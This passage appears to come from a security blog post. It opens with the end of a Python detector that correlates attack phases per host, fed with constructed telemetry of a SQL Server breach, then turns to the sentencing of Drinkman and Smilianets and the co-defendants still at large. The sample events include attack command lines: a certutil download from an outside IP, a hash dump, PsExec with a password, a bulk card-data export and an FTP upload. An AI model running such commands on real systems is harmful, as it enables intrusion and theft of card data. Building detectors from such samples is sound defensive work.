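SQLSRV = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
SYS32 = r"C:\Windows\System32"
# Constructed sample telemetry.  SQL01 shows the whole chain; SQL02 is benign admin noise.
SAMPLE_EVENTS = [
    ev("2007-12-24T02:11:05", "SQL01", "SYSTEM", SQLSRV, SYS32 + r"\cmd.exe",
       r"cmd.exe /c whoami"),
    ev("2007-12-24T02:11:09", "SQL01", "SYSTEM", SYS32 + r"\cmd.exe", SYS32 + r"\certutil.exe",
       r"certutil -urlcache -split -f http://203.0.113.9/t.zip c:\temp\t.zip"),
    ev("2007-12-24T02:15:40", "SQL01", "SYSTEM", SYS32 + r"\cmd.exe", r"c:\temp\QuarksPwDump.exe",
       r"QuarksPwDump.exe --dump-hash-local"),
    ev("2007-12-24T03:02:13", "SQL01", r"CORP\veritas", SYS32 + r"\cmd.exe", r"c:\temp\PsExec.exe",
       r"PsExec.exe \\SQL02 -u CORP\veritas -p BACKUP cmd.exe"),
    ev("2007-12-24T03:30:00", "SQL01", r"CORP\veritas", SYS32 + r"\cmd.exe", SYS32 + r"\schtasks.exe",
       r'schtasks /create /sc daily /st 02:00 /tn idx /tr "bcp.exe cards.dbo.track2 queryout c:\temp\o.dat -c -T"'),
    ev("2007-12-25T02:00:02", "SQL01", r"CORP\veritas", SYS32 + r"\taskeng.exe",
       r"C:\Program Files\Microsoft SQL Server\90\Tools\Binn\bcp.exe",
       r"bcp.exe cards.dbo.track2 queryout c:\temp\o.dat -c -T"),
    ev("2007-12-25T02:05:10", "SQL01", r"CORP\veritas", SYS32 + r"\cmd.exe", SYS32 + r"\ftp.exe",
       r"ftp -s:c:\temp\up.txt 203.0.113.9"),
    ev("2007-12-25T09:00:00", "SQL02", r"CORP\dba", r"C:\Windows\explorer.exe",
       r"C:\Program Files\Microsoft SQL Server\90\Tools\Binn\sqlcmd.exe",
       r'sqlcmd -E -Q "select count(*) from orders"'),
    ev("2007-12-25T09:05:00", "SQL02", r"CORP\admin", SYS32 + r"\cmd.exe", SYS32 + r"\schtasks.exe",
       r'schtasks /create /sc weekly /tn defrag /tr "defrag c:"'),
]

if __name__ == "__main__":
    for host, rows in detect(SAMPLE_EVENTS).items():
        for ts, phase, desc, cmd in rows:
            print(f"{host} {ts} [{phase}: {desc}] {cmd}")
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

The design point is the last function: each rule on its own is noisy (DBAs run bcp, admins create scheduled tasks), but a SQL Server that spawns a shell, pulls a file, dumps hashes, runs PsExec, schedules a bulk export and opens a scripted FTP session within a day is the pattern the text describes, and correlating phases per host is what turns the individual weak signals into an alert worth paging on.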

Justice?

With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators?  Or are they, in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.